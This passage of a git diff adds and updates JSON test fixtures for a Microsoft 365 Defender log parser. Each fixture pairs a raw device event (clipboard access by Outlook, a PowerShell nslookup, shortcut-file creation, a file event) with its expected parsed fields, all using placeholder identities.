Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "CommandLine": "\"OUTLOOK.EXE\" ", + "FileSize": 44152968, + "LogonId": "389220681", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Outlook", + "VersionInfoInternalFileName": "Outlook", + "VersionInfoOriginalFileName": "Outlook.exe", + "VersionInfoProductName": "Microsoft Outlook", + "VersionInfoProductVersion": "16.0.17928.20216" + } + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..ea0ddb0df --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json @@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "CommandLine": "powershell.exe", + "FileSize": 450560, + "LogonId": "398124703", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows PowerShell", + "VersionInfoInternalFileName": "POWERSHELL", + "VersionInfoOriginalFileName": "PowerShell.EXE", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.3085" + } + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..37a646715 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "process": { + "parent": { + "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "FileSize": 1621656, + "LogonId": "8066492", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Word", + "VersionInfoInternalFileName": "WinWord", + "VersionInfoOriginalFileName": "WinWord.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.17928.20216" + } + } + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "name": "FILENAME.LNK", + "parent": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "start": "2024-11-06T16:05:23.113802Z", + "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json index 7428190cf..94b70858f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json @@ -16,17 +16,19 @@ "@timestamp": "2022-09-01T07:46:42.468408Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "InitiatingProcessFileSize": 56824728, - "InitiatingProcessIntegrityLevel": "Medium", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", - "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", - "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", - "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "FileSize": 56824728, + "IntegrityLevel": "Medium", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", + "VersionInfoInternalFileName": "OneDriveSetup.exe", + "VersionInfoOriginalFileName": "OneDriveSetup.exe", + "VersionInfoProductName": "Microsoft OneDrive", + "VersionInfoProductVersion": "22.166.0807.0002" + } }, "type": "FileDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json new file mode 100644 index 000000000..1a9daafcd --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json @@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe 